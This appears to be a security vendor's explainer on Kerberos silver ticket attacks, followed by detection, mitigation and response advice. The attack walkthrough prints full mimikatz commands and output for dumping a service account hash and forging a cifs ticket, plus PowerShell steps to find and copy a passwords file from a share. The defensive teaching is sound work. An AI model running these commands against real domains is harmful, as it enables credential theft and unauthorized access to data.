Similar in concept to a golden ticket, a silver ticket attack involves compromising credentials and abusing the design of the Kerberos protocol. However, unlike a golden ticket — which grants an adversary unfettered access to the domain — a silver ticket only allows an attacker for forge ticket-granting service (TGS) tickets for specific services. TGS tickets are encrypted with the password hash for the service – therefore, if an adversary steals the hash for a service account they can mint TGS tickets for that service.
While its scope may be smaller, it is still a powerful tool in an adversary’s kit, enabling persistent and stealthy access to resources. Since only the service account’s password hash is required, it is also significantly easier to execute than a golden ticket. Techniques like harvesting hashes from
LSASS.exe and Kerberoasting are common ways adversaries obtain service account password hashes.
How Silver Ticket Works
Hover to see each step
Step 1: To gain the ability to mint TGS tickets, an adversary must first compromise the password hash of a service account. In this example, an adversary has compromised a file server but wishes to gain persistent and stealthy access. They begin the process of creating silver tickets by compromising the necessary password hash.
PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords # ... output truncated ... # Authentication Id : 0 ; 29151002 (00000000:01bccf1a) Session : Interactive from 5 User Name : DWM-5 Domain : Window Manager Logon Server : (null) Logon Time : 21/07/2020 10:26:16 SID : S-1-5-90-0-5 msv :  Primary * Username : FileServer1$ * Domain : DOMAIN * NTLM : 281fd98680ed31a9212256ada413db50 * SHA1 : c8fe518dfa728eb92eb2566328f0123e3bcb2717 # ... output truncated ... # mimikatz(commandline) # exit Bye!
Step 2: Tools like mimikatz can be used to mint silver tickets. The process for forging TGS tickets is similar to minting golden tickets, and with
mimikatz uses the same
kerberos::golden method, specifying the password hash of the service account instead of the
/domain– The fully qualified domain name of the Active Directory domain
/sid– The SID of the Active Directory domain
/user– The username to impersonate
/target– The fully qualified domain name of the server
/service– The target service name
/rc4– The NTLM/RC4 password hash
PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit mimikatz(commandline) # kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt User : NonExistentUser Domain : domain.com (DOMAIN) SID : S-1-5-21-5840559-2756745051-1363507867 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 8fbe632c51039f92c21bcef456b31f2b - rc4_hmac_nt Service : cifs Target : FileServer1.domain.com Lifetime : 27/07/2020 12:20:26 ; 25/07/2030 12:20:26 ; 25/07/2030 12:20:26 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session mimikatz(commandline) # misc::cmd Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7767043B8 mimikatz(commandline) # exit Bye!
Step 3: In the previous step, the adversary forged a silver ticket and injected it into a new
cmd.exe session. The silver ticket the attacker minted specified the
cifs service, which will allow the attacker to use the forged TGS to access file shares. Because the TGS is forged, it can be created for a user that does not actually exist in the domain making it harder for responders to track the adversary.
In this example, the adversary uses the forged ticket and the
Find-InterestingFile cmdlet, provided by the PowerShell module PowerSploit, to scan the file share for and exfiltrate sensitive data.
PS> Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\ FullName : \\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx Owner : DOMAIN\JOED LastAccessTime : 27/07/2020 12:47:44 LastWriteTime : 27/07/2020 12:47:44 CreationTime : 10/04/2011 10:04:50 Length : 76859 PS> Copy-Item -Path "\\FileServer1.domain.com\S$\shares\IT\Service Account Passwords.xlsx" -Destination "C:\Windows\Temp\a20ds3" PS>
Detect, Mitigate, and Respond
The normal process of obtaining a ticket-granting service ticket involves asking a domain controller to generate one. After the caller proves their identity, the domain controller with reply with a TGS encrypted with the service account password. But because the adversary has compromised that password, they can mint TGS tickets without communicating with the domain controller.
Thus, detecting silver tickets is only possible on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as: usernames that don’t exist; modified group memberships (added or removed); username and id mismatches; weaker-than-normal encryption types or ticket lifetimes exceeding the domain maximum (domain default lifetime is 10 hours; mimikatz default is 10 years).
The Windows event log has several audit events that are useful for detecting silver tickets:
|Audit Group Membership: Event ID 4627||Member Computers|
|Audit Logon: Event ID 4624||Member Computers|
Because silver tickets abuse the intended design of the Kerberos protocol, the risk of their use cannot be entirely eliminated. However, several mitigations exist that can make it harder for an adversary to compromise service account password hashes.
- Adopt strong password hygiene practices for service accounts. Their passwords should be randomly generated, a minimum of 30 characters, and routinely changed.
- Enable PAC Validation. Though it has known limitations, there are some situations in which it may assist with the detection and prevention of silver tickets.
- Remove end-user administrative privileges on member workstations, and adopt controlled privilege elevation solutions.
- Reduce administrative access to member workstations and servers to the least required.
- Use solutions like Microsoft LAPS to create strong, random, and unique passwords for local administrator accounts, and automatically rotate them periodically.
- Apply the recommended mitigations for Kerberoasting.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller.
If a silver ticket is detected, several response actions can be taken:
- Activate the incident response process and alert the incident response team.
- Quarantine any implicated computers for forensic investigation, as well as eradication and recovery activities.
- Reset the password of the compromised service account.